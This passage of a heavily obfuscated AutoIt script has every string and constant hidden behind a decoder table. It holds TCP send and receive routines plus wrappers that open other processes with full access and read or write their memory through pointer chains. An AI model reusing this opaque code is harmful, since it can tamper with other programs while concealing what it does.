  5837.     Local $a0e4d215c4a = $a624d311358
  5838.     Local $a3d4d412052 = ControlGetText($a0e4d215c4a, "", $a424d511045)
  5839.     $a5a4d013700 = StringLeft(StringReplace($a5a4d013700, Execute($a074d614151), ""), Number($a534d713f4b))
  5840.     $a3d4d412052 &= Execute($a454d814b24) & $a504d913543 & Execute($a014da15f30) & $a524db1443d & Execute($a5a4dc1230c) & $a304dd1060a & $a5a4d013700 & Execute($a194de1054a)
  5841.     If WinExists($a0e4d215c4a) Then
  5842.         ControlSetText($a0e4d215c4a, "", $a5c4df12e29, $a3d4d412052)
  5843.     Else
  5844.         SplashTextOn($a0e4d215c4a, $a3d4d412052, Number($a555d015f63), Number($a195d11510c), Number($a4e5d211b51), Number($a245d31033d), Number($a505d416102) + Number($a4b5d515705), "", Number($a395d615438))
  5845.     EndIf
  5846.     If $a1c4d113013 Then Sleep($a1c4d113013 * Number($a0e5d711f44))
  5847. EndFunc
  5848.  
  5849. Func a5c4100244a($a0ddc315161, $a08dc911e16, $a3ddcb16349, $a4fcc313f1d, $a485d814b3c = "", $a4acc214e45 = "")
  5850.     If NOT IsDeclared("SSA5C4100244A") Then
  5851.         Global $a115db12d2d = a2b00005424($os[5242]), $a2b5dc13333 = a2b00005424($os[5243]), $a515dd1412f = a2b00005424($os[5244]), $a1c5de14415 = a2b00005424($os[5245]), $a595df14363 = a2b00005424($os[5246]), $a546d011f58 = a2b00005424($os[5247]), $a196d113843 = a2b00005424($os[5248]), $a116d212910 = a2b00005424($os[5249]), $a206d315e5e = a2b00005424($os[5250]), $a2e6d412f47 = a2b00005424($os[5251]), $a126d510029 = a2b00005424($os[5252]), $a006d610500 = a2b00005424($os[5253]), $a3c6d716112 = a2b00005424($os[5254]), $a536d812f0f = a2b00005424($os[5255]), $a526d912e5e = a2b00005424($os[5256]), $a606da13822 = a2b00005424($os[5257])
  5852.         Global $ssa5c4100244a = 1
  5853.     EndIf
  5854.     Local $a4a5d912c00, $a3800e12616, $a5a5da14d41
  5855.     If $a4fcc313f1d Then a1631f05f2d($a08dc911e16)
  5856.     If $a485d814b3c <> "" Then
  5857.         If $a4acc214e45 <> -Number($a115db12d2d) Then
  5858.             If TCPSend($a0ddc315161, $a4acc214e45) = Number($a2b5dc13333) Then
  5859.                 TCPCloseSocket($a0ddc315161)
  5860.                 TCPShutdown()
  5861.                 Return Number($a515dd1412f)
  5862.             EndIf
  5863.         EndIf
  5864.         $a4a5d912c00 = ""
  5865.         $a5a5da14d41 = TimerInit()
  5866.         While StringLeft($a4a5d912c00, StringLen($a485d814b3c)) <> $a485d814b3c AND TimerDiff($a5a5da14d41) < Number($a1c5de14415)
  5867.             $a4a5d912c00 = TCPRecv($a0ddc315161, Number($a595df14363))
  5868.             If $a4fcc313f1d AND $a4a5d912c00 <> "" Then a1631f05f2d($a546d011f58 & $a4a5d912c00)
  5869.         WEnd
  5870.     EndIf
  5871.     If TCPSend($a0ddc315161, $a08dc911e16) = Number($a196d113843) Then
  5872.         TCPCloseSocket($a0ddc315161)
  5873.         TCPShutdown()
  5874.         Return Number($a116d212910)
  5875.     EndIf
  5876.     $a5a5da14d41 = TimerInit()
  5877.     $a4a5d912c00 = ""
  5878.     While $a4a5d912c00 = "" AND TimerDiff($a5a5da14d41) < Number($a206d315e5e)
  5879.         $a3800e12616 += Number($a2e6d412f47)
  5880.         $a4a5d912c00 = TCPRecv($a0ddc315161, Number($a126d510029))
  5881.         If $a3ddcb16349 = "" Then ExitLoop
  5882.     WEnd
  5883.     If $a3ddcb16349 <> "" Then
  5884.         If $a4fcc313f1d Then a1631f05f2d($a3800e12616 & $a006d610500 & $a4a5d912c00)
  5885.         If StringLeft($a4a5d912c00, StringLen($a3ddcb16349)) <> $a3ddcb16349 Then
  5886.             TCPCloseSocket($a0ddc315161)
  5887.             TCPShutdown()
  5888.             If $a4fcc313f1d Then a1631f05f2d($a3c6d716112 & $a3ddcb16349, Number($a536d812f0f))
  5889.             Return Number($a526d912e5e)
  5890.         EndIf
  5891.     EndIf
  5892.     Return Number($a606da13822)
  5893. EndFunc
  5894.  
  5895. Func a0841105532($a506db11c0e, $a266dc16245 = Default, $a1a6dd1582d = Default)
  5896.     If NOT IsDeclared("SSA0841105532") Then
  5897.         Global $a386df16355 = a2b00005424($os[5258]), $a607d112d09 = a2b00005424($os[5259]), $a087d212801 = a2b00005424($os[5260]), $a5b7d315a55 = a2b00005424($os[5261]), $a197d412910 = a2b00005424($os[5262]), $a1c7d610612 = a2b00005424($os[5263]), $a5a7d712b46 = a2b00005424($os[5264]), $a187d811738 = a2b00005424($os[5265]), $a007d91280a = a2b00005424($os[5266]), $a587da12214 = a2b00005424($os[5267]), $a047dc12649 = a2b00005424($os[5268]), $a0f7dd10410 = a2b00005424($os[5269]), $a607de10662 = a2b00005424($os[5270]), $a3c7df10d23 = a2b00005424($os[5271]), $a2f8d011134 = a2b00005424($os[5272]), $a4e8d11351d = a2b00005424($os[5273]), $a488d212f18 = a2b00005424($os[5274]), $a018d31245e = a2b00005424($os[5275]), $a088d415b38 = a2b00005424($os[5276]), $a018d514502 = a2b00005424($os[5277]), $a1e8d61343d = a2b00005424($os[5278]), $a328d810830 = a2b00005424($os[5279]), $a348d913503 = a2b00005424($os[5280]), $a178da13d5c = a2b00005424($os[5281]), $a318db1051a = a2b00005424($os[5282]), $a1a8dc15f5f = a2b00005424($os[5283]), $a518dd15228 = a2b00005424($os[5284]), $a398de1164c = a2b00005424($os[5285]), $a368df1241c = a2b00005424($os[5286]), $a529d113739 = a2b00005424($os[5287]), $a1b9d311127 = a2b00005424($os[5288]), $a4b9d41373b = a2b00005424($os[5289]), $a369d510c58 = a2b00005424($os[5290]), $a459d61495d = a2b00005424($os[5291]), $a259d812150 = a2b00005424($os[5292]), $a049d914a63 = a2b00005424($os[5293]), $a299da15c55 = a2b00005424($os[5294]), $a139db11158 = a2b00005424($os[5295]), $a609dc10a0d = a2b00005424($os[5296]), $a389dd1275f = a2b00005424($os[5297]), $a2f9de15e55 = a2b00005424($os[5298]), $a569df15e05 = a2b00005424($os[5299]), $a61ad01122f = a2b00005424($os[5300]), $a62ad110627 = a2b00005424($os[5301]), $a10ad214f32 = a2b00005424($os[5302])
  5898.         Global $ssa0841105532 = 1
  5899.     EndIf
  5900.     Local $a4d6de14d31 = Number($a386df16355), $a5c7d012856 = Number($a607d112d09), $a2f9131520e = Execute($a087d212801)
  5901.     If $a266dc16245 = Default Then $a266dc16245 = Number($a5b7d315a55)
  5902.     If $a1a6dd1582d = Default Then $a1a6dd1582d = $a197d412910
  5903.     Local $a1e7d511627 = DllCall($a1a6dd1582d, $a1c7d610612, $a5a7d712b46, $a187d811738, $a506db11c0e)
  5904.     If @error Then Return SetError(Number($a007d91280a), Number($a587da12214), "")
  5905.     Local $a497db15f24 = $a1e7d511627[Number($a047dc12649)]
  5906.     If $a497db15f24 = $a4d6de14d31 Then Return SetError(Number($a0f7dd10410), Number($a607de10662), "")
  5907.     $a1e7d511627 = DllCall($a1a6dd1582d, $a3c7df10d23, $a2f8d011134, $a4e8d11351d, $a497db15f24, $a488d212f18, Number($a018d31245e), $a088d415b38, $a5c7d012856)
  5908.     If @error Then Return SetError(Number($a018d514502), Number($a1e8d61343d), "")
  5909.     Local $a498d711c13 = $a1e7d511627[Number($a328d810830)]
  5910.     If $a498d711c13 = Number($a348d913503) Then
  5911.         $a1e7d511627 = DllCall($a1a6dd1582d, $a178da13d5c, $a318db1051a)
  5912.         If @error Then Return SetError(Number($a1a8dc15f5f), Number($a518dd15228), "")
  5913.         Return SetError(Number($a398de1164c), $a1e7d511627[Number($a368df1241c)], "")
  5914.     EndIf
  5915.     Local $a3d9d010460 = DllStructCreate($a529d113739, $a498d711c13)
  5916.     Local $a2b9d211727 = a3141203b0b(DllStructGetData($a3d9d010460, Number($a1b9d311127)))
  5917.     If @error Then Return SetError(Number($a4b9d41373b), Number($a369d510c58), $a2b9d211727)
  5918.     If $a266dc16245 = Number($a459d61495d) Then
  5919.         Local $a2f9d712733
  5920.         $a2b9d211727 &= $a2f9131520e
  5921.         For $a3800e12616 = Number($a259d812150) To Number($a049d914a63)
  5922.             $a2f9d712733 = DllStructCreate($a299da15c55, DllStructGetData($a3d9d010460, Number($a139db11158)) + ($a3800e12616 * Number($a609dc10a0d)))
  5923.             If DllStructGetData($a2f9d712733, Number($a389dd1275f)) = Number($a2f9de15e55) Then ExitLoop
  5924.             $a2b9d211727 &= a3141203b0b(DllStructGetData($a2f9d712733, Number($a569df15e05)))
  5925.             If @error Then
  5926.                 SetError(Number($a61ad01122f))
  5927.                 ExitLoop
  5928.             EndIf
  5929.         Next
  5930.         Return StringSplit(StringStripWS($a2b9d211727, Number($a62ad110627)), Execute($a10ad214f32))
  5931.     Else
  5932.         Return $a2b9d211727
  5933.     EndIf
  5934. EndFunc
  5935.  
  5936. Func a3141203b0b($a27ad313f13, $a5925c12e3c = -1)
  5937.     If NOT IsDeclared("SSA3141203B0B") Then
  5938.         Global $a54ad61234b = a2b00005424($os[5303]), $a00ad711e44 = a2b00005424($os[5304]), $a1aad816241 = a2b00005424($os[5305]), $a4cad913b16 = a2b00005424($os[5306]), $a32ada15d58 = a2b00005424($os[5307]), $a33adb14741 = a2b00005424($os[5308]), $a1fadc12111 = a2b00005424($os[5309]), $a03add12102 = a2b00005424($os[5310]), $a24ade1002f = a2b00005424($os[5311]), $a28adf1550f = a2b00005424($os[5312]), $a34bd01124c = a2b00005424($os[5313]), $a3fbd113a2b = a2b00005424($os[5314]), $a5abd21503b = a2b00005424($os[5315]), $a10bd314e42 = a2b00005424($os[5316]), $a62bd413658 = a2b00005424($os[5317])
  5939.         Global $ssa3141203b0b = 1
  5940.     EndIf
  5941.     Local $a20ad415b3f, $a56ad510b42
  5942.     If $a27ad313f13 < Number($a54ad61234b) Then Return ""
  5943.     If $a5925c12e3c < Number($a00ad711e44) Then
  5944.         $a20ad415b3f = DllCall($a1aad816241, $a4cad913b16, $a32ada15d58, $a33adb14741, $a27ad313f13)
  5945.         If @error Then Return SetError(Number($a1fadc12111), Number($a03add12102), "")
  5946.         $a5925c12e3c = $a20ad415b3f[Number($a24ade1002f)] + Number($a28adf1550f)
  5947.     EndIf
  5948.     $a56ad510b42 = DllStructCreate($a34bd01124c & $a5925c12e3c & $a3fbd113a2b, $a27ad313f13)
  5949.     If @error Then Return SetError(Number($a5abd21503b), Number($a10bd314e42), "")
  5950.     Return SetExtended($a5925c12e3c, DllStructGetData($a56ad510b42, Number($a62bd413658)))
  5951. EndFunc
  5952.  
  5953. Func a1d41303e46($a16bd51114b, $a17bd611118 = 2035711, $a30bd715b15 = 1)
  5954.     If NOT IsDeclared("SSA1D41303E46") Then
  5955.         Global $a48bd814031 = a2b00005424($os[5318]), $a36bd913135 = a2b00005424($os[5319]), $a60bdb15911 = a2b00005424($os[5320]), $a14bdc1080d = a2b00005424($os[5321]), $a5dbdd12942 = a2b00005424($os[5322]), $a29bde15b33 = a2b00005424($os[5323]), $a3ccd01512b = a2b00005424($os[5324]), $a13cd116009 = a2b00005424($os[5325]), $a27cd211f3d = a2b00005424($os[5326]), $a46cd31285a = a2b00005424($os[5327]), $a00cd41325f = a2b00005424($os[5328]), $a11cd513b11 = a2b00005424($os[5329]), $a29cd612b3b = a2b00005424($os[5330]), $a31cd714c2d = a2b00005424($os[5331]), $a1ccd815e40 = a2b00005424($os[5332]), $a10cd911362 = a2b00005424($os[5333]), $a22cda14352 = a2b00005424($os[5334])
  5956.         Global $ssa1d41303e46 = 1
  5957.     EndIf
  5958.     If NOT ProcessExists($a16bd51114b) Then
  5959.         SetError(Number($a48bd814031))
  5960.         Return Number($a36bd913135)
  5961.     EndIf
  5962.     Local $a10bda14f3e[Number($a60bdb15911)] = [DllOpen($a14bdc1080d)]
  5963.     If @error Then
  5964.         SetError(Number($a5dbdd12942))
  5965.         Return Number($a29bde15b33)
  5966.     EndIf
  5967.     Local $a03bdf10d62 = DllCall($a10bda14f3e[Number($a3ccd01512b)], $a13cd116009, $a27cd211f3d, $a46cd31285a, $a17bd611118, $a00cd41325f, $a30bd715b15, $a11cd513b11, $a16bd51114b)
  5968.     If @error Then
  5969.         DllClose($a10bda14f3e[Number($a29cd612b3b)])
  5970.         SetError(Number($a31cd714c2d))
  5971.         Return Number($a1ccd815e40)
  5972.     EndIf
  5973.     $a10bda14f3e[Number($a10cd911362)] = $a03bdf10d62[Number($a22cda14352)]
  5974.     Return $a10bda14f3e
  5975. EndFunc
  5976.  
  5977. Func a224140311e($a18cdb1110b, $a10bda14f3e, $a30cdc14519 = "dword")
  5978.     If NOT IsDeclared("SSA224140311E") Then
  5979.         Global $a2bcdd14f4d = a2b00005424($os[5335]), $a5ccde1131c = a2b00005424($os[5336]), $a12dd011b5a = a2b00005424($os[5337]), $a42dd113d13 = a2b00005424($os[5338]), $a22dd21514f = a2b00005424($os[5339]), $a5bdd311f43 = a2b00005424($os[5340]), $a31dd41443a = a2b00005424($os[5341]), $a60dd512710 = a2b00005424($os[5342]), $a08dd616004 = a2b00005424($os[5343]), $a59dd713858 = a2b00005424($os[5344]), $a02dd81090a = a2b00005424($os[5345]), $a46dd912d04 = a2b00005424($os[5346]), $a58dda1493d = a2b00005424($os[5347]), $a03ddc14257 = a2b00005424($os[5348]), $a3fddd12d29 = a2b00005424($os[5349]), $a3fdde12223 = a2b00005424($os[5350])
  5980.         Global $ssa224140311e = 1
  5981.     EndIf
  5982.     If NOT IsArray($a10bda14f3e) Then
  5983.         SetError(Number($a2bcdd14f4d))
  5984.         Return Number($a5ccde1131c)
  5985.     EndIf
  5986.     Local $a40cdf14a50 = DllStructCreate($a30cdc14519)
  5987.     If @error Then
  5988.         SetError(@error + Number($a12dd011b5a))
  5989.         Return Number($a42dd113d13)
  5990.     EndIf
  5991.     DllCall($a10bda14f3e[Number($a22dd21514f)], $a5bdd311f43, $a31dd41443a, $a60dd512710, $a10bda14f3e[Number($a08dd616004)], $a59dd713858, $a18cdb1110b, $a02dd81090a, DllStructGetPtr($a40cdf14a50), $a46dd912d04, DllStructGetSize($a40cdf14a50), $a58dda1493d, "")
  5992.     If NOT @error Then
  5993.         Local $a08ddb1542c = DllStructGetData($a40cdf14a50, Number($a03ddc14257))
  5994.         Return $a08ddb1542c
  5995.     Else
  5996.         SetError(Number($a3fddd12d29))
  5997.         Return Number($a3fdde12223)
  5998.     EndIf
  5999. EndFunc
  6000.  
  6001. Func a3e41504331($a18cdb1110b, $a10bda14f3e, $a20ddf1235b, $a30cdc14519 = "dword")
  6002.     If NOT IsDeclared("SSA3E41504331") Then
  6003.         Global $a23ed015c12 = a2b00005424($os[5351]), $a5aed111060 = a2b00005424($os[5352]), $a54ed213c15 = a2b00005424($os[5353]), $a1bed313208 = a2b00005424($os[5354]), $a41ed412048 = a2b00005424($os[5355]), $a53ed515227 = a2b00005424($os[5356]), $a3aed613e61 = a2b00005424($os[5357]), $a4ded710f20 = a2b00005424($os[5358]), $a06ed813209 = a2b00005424($os[5359]), $a1ded91162e = a2b00005424($os[5360]), $a56eda15054 = a2b00005424($os[5361]), $a1bedb14d5b = a2b00005424($os[5362]), $a30edc12522 = a2b00005424($os[5363]), $a62edd1060d = a2b00005424($os[5364]), $a11ede11419 = a2b00005424($os[5365]), $a35edf16005 = a2b00005424($os[5366]), $a02fd011835 = a2b00005424($os[5367]), $a12fd11323e = a2b00005424($os[5368]), $a5dfd214b01 = a2b00005424($os[5369])
  6004.         Global $ssa3e41504331 = 1
  6005.     EndIf
  6006.     If NOT IsArray($a10bda14f3e) Then
  6007.         SetError(Number($a23ed015c12))
  6008.         Return Number($a5aed111060)
  6009.     EndIf
  6010.     Local $a40cdf14a50 = DllStructCreate($a30cdc14519)
  6011.     If @error Then
  6012.         SetError(@error + Number($a54ed213c15))
  6013.         Return Number($a1bed313208)
  6014.     Else
  6015.         DllStructSetData($a40cdf14a50, Number($a41ed412048), $a20ddf1235b)
  6016.         If @error Then
  6017.             SetError(Number($a53ed515227))
  6018.             Return Number($a3aed613e61)
  6019.         EndIf
  6020.     EndIf
  6021.     DllCall($a10bda14f3e[Number($a4ded710f20)], $a06ed813209, $a1ded91162e, $a56eda15054, $a10bda14f3e[Number($a1bedb14d5b)], $a30edc12522, $a18cdb1110b, $a62edd1060d, DllStructGetPtr($a40cdf14a50), $a11ede11419, DllStructGetSize($a40cdf14a50), $a35edf16005, "")
  6022.     If NOT @error Then
  6023.         Return Number($a02fd011835)
  6024.     Else
  6025.         SetError(Number($a12fd11323e))
  6026.         Return Number($a5dfd214b01)
  6027.     EndIf
  6028. EndFunc
  6029.  
  6030. Func a3841600006($a10bda14f3e)
  6031.     If NOT IsDeclared("SSA3841600006") Then
  6032.         Global $a02fd31585e = a2b00005424($os[5370]), $a00fd410b33 = a2b00005424($os[5371]), $a59fd516227 = a2b00005424($os[5372]), $a30fd611b12 = a2b00005424($os[5373]), $a50fd71340e = a2b00005424($os[5374]), $a32fd81383d = a2b00005424($os[5375]), $a10fd916346 = a2b00005424($os[5376]), $a49fda12736 = a2b00005424($os[5377]), $a2afdb15320 = a2b00005424($os[5378]), $a00fdc13923 = a2b00005424($os[5379]), $a37fdd12f14 = a2b00005424($os[5380]), $a43fde1150a = a2b00005424($os[5381])
  6033.         Global $ssa3841600006 = 1
  6034.     EndIf
  6035.     If NOT IsArray($a10bda14f3e) Then
  6036.         SetError(Number($a02fd31585e))
  6037.         Return Number($a00fd410b33)
  6038.     EndIf
  6039.     DllCall($a10bda14f3e[Number($a59fd516227)], $a30fd611b12, $a50fd71340e, $a32fd81383d, $a10bda14f3e[Number($a10fd916346)])
  6040.     If NOT @error Then
  6041.         DllClose($a10bda14f3e[Number($a49fda12736)])
  6042.         Return Number($a2afdb15320)
  6043.     Else
  6044.         DllClose($a10bda14f3e[Number($a00fdc13923)])
  6045.         SetError(Number($a37fdd12f14))
  6046.         Return Number($a43fde1150a)
  6047.     EndIf
  6048. EndFunc
  6049.  
  6050. Func a4a41703e47($a18cdb1110b, $a10bda14f3e, $a00fdf13349, $a30cdc14519 = "dword")
  6051.     If NOT IsDeclared("SSA4A41703E47") Then
  6052.         Global $a5a0e112744 = a2b00005424($os[5382]), $a0e0e211e50 = a2b00005424($os[5383]), $a160e314e63 = a2b00005424($os[5384]), $a2d0e41530b = a2b00005424($os[5385]), $a4c0e514d17 = a2b00005424($os[5386]), $a470e712335 = a2b00005424($os[5387]), $a2b0e812001 = a2b00005424($os[5388]), $a180e91610f = a2b00005424($os[5389]), $a2b0ea11a50 = a2b00005424($os[5390]), $a3d0eb12f22 = a2b00005424($os[5391]), $a5f0ec12320 = a2b00005424($os[5392]), $a070ed15953 = a2b00005424($os[5393]), $a4a0ee14d08 = a2b00005424($os[5394]), $a240ef15a3c = a2b00005424($os[5395]), $a511e013239 = a2b00005424($os[5396]), $a3d1e111249 = a2b00005424($os[5397]), $a3e1e21203e = a2b00005424($os[5398]), $a1b1e315e28 = a2b00005424($os[5399]), $a2e1e410f33 = a2b00005424($os[5400]), $a501e51125b = a2b00005424($os[5401]), $a261e613a07 = a2b00005424($os[5402]), $a531e71373e = a2b00005424($os[5403]), $a431e810460 = a2b00005424($os[5404]), $a551e910b48 = a2b00005424($os[5405]), $a2c1ea13741 = a2b00005424($os[5406]), $a621eb1540f = a2b00005424($os[5407]), $a5c1ec11315 = a2b00005424($os[5408]), $a101ed1010e = a2b00005424($os[5409]), $a0a1ee1371d = a2b00005424($os[5410]), $a3c1ef13a0f = a2b00005424($os[5411]), $a602e010628 = a2b00005424($os[5412]), $a162e110350 = a2b00005424($os[5413]), $a212e21523e = a2b00005424($os[5414]), $a252e31235f = a2b00005424($os[5415]), $a3a2e414d55 = a2b00005424($os[5416]), $a542e513044 = a2b00005424($os[5417]), $a0b2e61223b = a2b00005424($os[5418]), $a0e2e714a03 = a2b00005424($os[5419]), $a0c2e81303a = a2b00005424($os[5420]), $a402e915306 = a2b00005424($os[5421]), $a282ea11127 = a2b00005424($os[5422]), $a492eb1365d = a2b00005424($os[5423]), $a362ec11d5c = a2b00005424($os[5424]), $a462ed1495a = a2b00005424($os[5425]), $a4a2ee14930 = a2b00005424($os[5426]), $a572ef12e25 = a2b00005424($os[5427]), $a013e011502 = a2b00005424($os[5428]), $a083e115a1e = a2b00005424($os[5429]), $a013e214726 = a2b00005424($os[5430]), $a203e314e30 = a2b00005424($os[5431]), $a2f3e41160a = a2b00005424($os[5432]), $a353e513c04 = a2b00005424($os[5433])
  6053.         Global $a1d3e610722 = a2b00005424($os[5434]), $a553e710f4e = a2b00005424($os[5435]), $a213e815532 = a2b00005424($os[5436])
  6054.         Global $ssa4a41703e47 = 1
  6055.     EndIf
  6056.     If IsArray($a00fdf13349) Then
  6057.         If IsArray($a10bda14f3e) Then
  6058.             Local $a130e013e5b = UBound($a00fdf13349) - Number($a5a0e112744)
  6059.         Else
  6060.             SetError(Number($a0e0e211e50))
  6061.             Return Number($a160e314e63)
  6062.         EndIf
  6063.     Else
  6064.         SetError(Number($a2d0e41530b))
  6065.         Return Number($a4c0e514d17)
  6066.     EndIf
  6067.     Local $a110e611d15[Number($a470e712335)], $a3800e12616
  6068.     Local $a40cdf14a50 = DllStructCreate($a2b0e812001)
  6069.     For $a3800e12616 = Number($a180e91610f) To $a130e013e5b
  6070.         If $a3800e12616 = $a130e013e5b Then
  6071.             $a40cdf14a50 = DllStructCreate($a30cdc14519)
  6072.             If @error Then
  6073.                 SetError(@error + Number($a2b0ea11a50))
  6074.                 Return Number($a3d0eb12f22)
  6075.             EndIf
  6076.             $a18cdb1110b = $a5f0ec12320 & Hex(Int($a110e611d15[Number($a070ed15953)] + $a00fdf13349[$a3800e12616]))
  6077.             DllCall($a10bda14f3e[Number($a4a0ee14d08)], $a240ef15a3c, $a511e013239, $a3d1e111249, $a10bda14f3e[Number($a3e1e21203e)], $a1b1e315e28, $a18cdb1110b, $a2e1e410f33, DllStructGetPtr($a40cdf14a50), $a501e51125b, DllStructGetSize($a40cdf14a50), $a261e613a07, "")
  6078.             If @error Then
  6079.                 SetError(Number($a531e71373e))
  6080.                 Return Number($a431e810460)
  6081.             EndIf
  6082.             $a110e611d15[Number($a551e910b48)] = DllStructGetData($a40cdf14a50, Number($a2c1ea13741))
  6083.         ElseIf $a3800e12616 = Number($a621eb1540f) Then
  6084.             DllCall($a10bda14f3e[Number($a5c1ec11315)], $a101ed1010e, $a0a1ee1371d, $a3c1ef13a0f, $a10bda14f3e[Number($a602e010628)], $a162e110350, $a18cdb1110b, $a212e21523e, DllStructGetPtr($a40cdf14a50), $a252e31235f, DllStructGetSize($a40cdf14a50), $a3a2e414d55, "")
  6085.             If @error Then
  6086.                 SetError(Number($a542e513044))
  6087.                 Return Number($a0b2e61223b)
  6088.             EndIf
  6089.             $a110e611d15[Number($a0e2e714a03)] = DllStructGetData($a40cdf14a50, Number($a0c2e81303a))
  6090.         Else
  6091.             $a18cdb1110b = $a402e915306 & Hex(Int($a110e611d15[Number($a282ea11127)] + $a00fdf13349[$a3800e12616]))
  6092.             DllCall($a10bda14f3e[Number($a492eb1365d)], $a362ec11d5c, $a462ed1495a, $a4a2ee14930, $a10bda14f3e[Number($a572ef12e25)], $a013e011502, $a18cdb1110b, $a083e115a1e, DllStructGetPtr($a40cdf14a50), $a013e214726, DllStructGetSize($a40cdf14a50), $a203e314e30, "")
  6093.             If @error Then
  6094.                 SetError(Number($a2f3e41160a))
  6095.                 Return Number($a353e513c04)
  6096.             EndIf
  6097.             $a110e611d15[Number($a1d3e610722)] = DllStructGetData($a40cdf14a50, Number($a553e710f4e))
  6098.         EndIf
  6099.     Next
  6100.     $a110e611d15[Number($a213e815532)] = $a18cdb1110b
  6101.     Return $a110e611d15
  6102. EndFunc
  6103.  
  6104. Func a0f41803755($a18cdb1110b, $a10bda14f3e, $a00fdf13349, $a20ddf1235b, $a30cdc14519 = "dword")
  6105.     If NOT IsDeclared("SSA0F41803755") Then
  6106.         Global $a123e911041 = a2b00005424($os[5437]), $a5b3ea12818 = a2b00005424($os[5438]), $a3c3eb16257 = a2b00005424($os[5439]), $a443ec1591d = a2b00005424($os[5440]), $a2c3ed1444c = a2b00005424($os[5441]), $a043ef1284f = a2b00005424($os[5442]), $a104e011361 = a2b00005424($os[5443]), $a304e11175e = a2b00005424($os[5444]), $a1c4e213043 = a2b00005424($os[5445]), $a5c4e315258 = a2b00005424($os[5446]), $a114e415116 = a2b00005424($os[5447]), $a594e512355 = a2b00005424($os[5448]), $a4a4e613a5b = a2b00005424($os[5449]), $a5d4e716063 = a2b00005424($os[5450]), $a2d4e810e35 = a2b00005424($os[5451]), $a434e912421 = a2b00005424($os[5452]), $a184ea13f01 = a2b00005424($os[5453]), $a494eb10e60 = a2b00005424($os[5454]), $a2b4ec1310c = a2b00005424($os[5455]), $a254ed10d29 = a2b00005424($os[5456]), $a164ee1621f = a2b00005424($os[5457]), $a054ef15429 = a2b00005424($os[5458]), $a435e013752 = a2b00005424($os[5459]), $a4f5e11160e = a2b00005424($os[5460]), $a365e215447 = a2b00005424($os[5461]), $a205e31521b = a2b00005424($os[5462]), $a5e5e41565e = a2b00005424($os[5463]), $a595e513d4d = a2b00005424($os[5464]), $a485e612559 = a2b00005424($os[5465]), $a2a5e711438 = a2b00005424($os[5466]), $a115e813b38 = a2b00005424($os[5467]), $a5d5e91022a = a2b00005424($os[5468]), $a105ea10717 = a2b00005424($os[5469]), $a105eb12f33 = a2b00005424($os[5470]), $a635ec12043 = a2b00005424($os[5471]), $a485ed15025 = a2b00005424($os[5472]), $a1a5ee13133 = a2b00005424($os[5473]), $a5c5ef14d09 = a2b00005424($os[5474]), $a266e01635b = a2b00005424($os[5475]), $a2e6e111059 = a2b00005424($os[5476]), $a296e214361 = a2b00005424($os[5477]), $a206e310918 = a2b00005424($os[5478]), $a126e415a3a = a2b00005424($os[5479]), $a636e515c26 = a2b00005424($os[5480]), $a316e614449 = a2b00005424($os[5481]), $a236e71461a = a2b00005424($os[5482]), $a1a6e81572d = a2b00005424($os[5483]), $a2f6e91282d = a2b00005424($os[5484]), $a306ea13b1b = a2b00005424($os[5485]), $a226eb14b55 = a2b00005424($os[5486])
  6107.         Global $ssa0f41803755 = 1
  6108.     EndIf
  6109.     If IsArray($a00fdf13349) Then
  6110.         If IsArray($a10bda14f3e) Then
  6111.             Local $a130e013e5b = UBound($a00fdf13349) - Number($a123e911041)
  6112.         Else
  6113.             SetError(Number($a5b3ea12818))
  6114.             Return Number($a3c3eb16257)
  6115.         EndIf
  6116.     Else
  6117.         SetError(Number($a443ec1591d))
  6118.         Return Number($a2c3ed1444c)
  6119.     EndIf
  6120.     Local $a623ee11b25, $a3800e12616
  6121.     Local $a40cdf14a50 = DllStructCreate($a043ef1284f)
  6122.     For $a3800e12616 = Number($a104e011361) To $a130e013e5b
  6123.         If $a3800e12616 = $a130e013e5b Then
  6124.             $a40cdf14a50 = DllStructCreate($a30cdc14519)
  6125.             If @error Then
  6126.                 SetError(@error + Number($a304e11175e))
  6127.                 Return Number($a1c4e213043)
  6128.             EndIf
  6129.             DllStructSetData($a40cdf14a50, Number($a5c4e315258), $a20ddf1235b)
  6130.             If @error Then
  6131.                 SetError(Number($a114e415116))
  6132.                 Return Number($a594e512355)
  6133.             EndIf
  6134.             $a18cdb1110b = $a4a4e613a5b & Hex(Int($a623ee11b25 + $a00fdf13349[$a3800e12616]))
  6135.             DllCall($a10bda14f3e[Number($a5d4e716063)], $a2d4e810e35, $a434e912421, $a184ea13f01, $a10bda14f3e[Number($a494eb10e60)], $a2b4ec1310c, $a18cdb1110b, $a254ed10d29, DllStructGetPtr($a40cdf14a50), $a164ee1621f, DllStructGetSize($a40cdf14a50), $a054ef15429, "")
  6136.             If @error Then
  6137.                 SetError(Number($a435e013752))
  6138.                 Return Number($a4f5e11160e)
  6139.             Else
  6140.                 Return $a18cdb1110b
  6141.             EndIf
  6142.         ElseIf $a3800e12616 = Number($a365e215447) Then
  6143.             DllCall($a10bda14f3e[Number($a205e31521b)], $a5e5e41565e, $a595e513d4d, $a485e612559, $a10bda14f3e[Number($a2a5e711438)], $a115e813b38, $a18cdb1110b, $a5d5e91022a, DllStructGetPtr($a40cdf14a50), $a105ea10717, DllStructGetSize($a40cdf14a50), $a105eb12f33, "")
  6144.             If @error Then
  6145.                 SetError(Number($a635ec12043))
  6146.                 Return Number($a485ed15025)
  6147.             EndIf
  6148.             $a623ee11b25 = DllStructGetData($a40cdf14a50, Number($a1a5ee13133))
  6149.         Else
  6150.             $a18cdb1110b = $a5c5ef14d09 & Hex(Int($a623ee11b25 + $a00fdf13349[$a3800e12616]))
  6151.             DllCall($a10bda14f3e[Number($a266e01635b)], $a2e6e111059, $a296e214361, $a206e310918, $a10bda14f3e[Number($a126e415a3a)], $a636e515c26, $a18cdb1110b, $a316e614449, DllStructGetPtr($a40cdf14a50), $a236e71461a, DllStructGetSize($a40cdf14a50), $a1a6e81572d, "")
  6152.             If @error Then
  6153.                 SetError(Number($a2f6e91282d))
  6154.                 Return Number($a306ea13b1b)
  6155.             EndIf
  6156.             $a623ee11b25 = DllStructGetData($a40cdf14a50, Number($a226eb14b55))
  6157.         EndIf
  6158.     Next
  6159. EndFunc
  6160.  
  6161. Func a1741901449($a5c6ec12d5c, $a366ed1080c)
  6162.     If NOT IsDeclared("SSA1741901449") Then
